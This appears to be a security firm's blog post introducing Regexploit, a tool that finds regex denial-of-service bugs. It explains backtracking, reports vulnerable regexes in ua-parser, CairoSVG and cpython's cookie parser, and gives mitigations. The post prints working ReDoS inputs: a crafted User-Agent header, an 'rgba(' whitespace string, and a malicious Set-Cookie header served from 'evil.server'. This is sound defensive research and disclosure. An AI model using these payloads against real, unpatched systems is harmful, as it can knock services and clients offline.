Regexploit: DoS-able Regular Expressions


When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.

Backtracking

To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)

That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

until it successfully matches a dot - $1="123.456"

123.456.789
123.456.789
123.456.789

The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.

123.456.789
123.456.789
123.456.789

Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

$2="456.789" but now there’s no dot! That can’t be the correct group 2…

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019. In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, awaits, requests and responses until regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

\d+[^\);]+[^\);]*\)

Digit characters are matched by \d and by [ˆ\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [ˆ\);]+ and [ˆ\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.

Regexploit

Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.

Results

The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba(   100,200, 10, 0.5   ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n3) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^ (\d\d?) # day (?:\s+|[-\/]) (\w+) # month (?:\s+|[-\/]) (\d+) # year (?: (?:\s+|:) # separator before clock (\d\d?):(\d\d) # hour:min (?::(\d\d))? # optional seconds )? # optional clock \s* ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone \s* (?:\(\w+\))? # ASCII representation of timezone in parens. \s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1 X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

xkcd 208: Regular Expressions Sorry, I wanted to shoehorn this comic in somewhere

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. There are also some regex features such as backreferences which had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.

How to meme?

Many tiny regexes

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids REDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.

Gotta catch ‘em all 🐛🐞🦠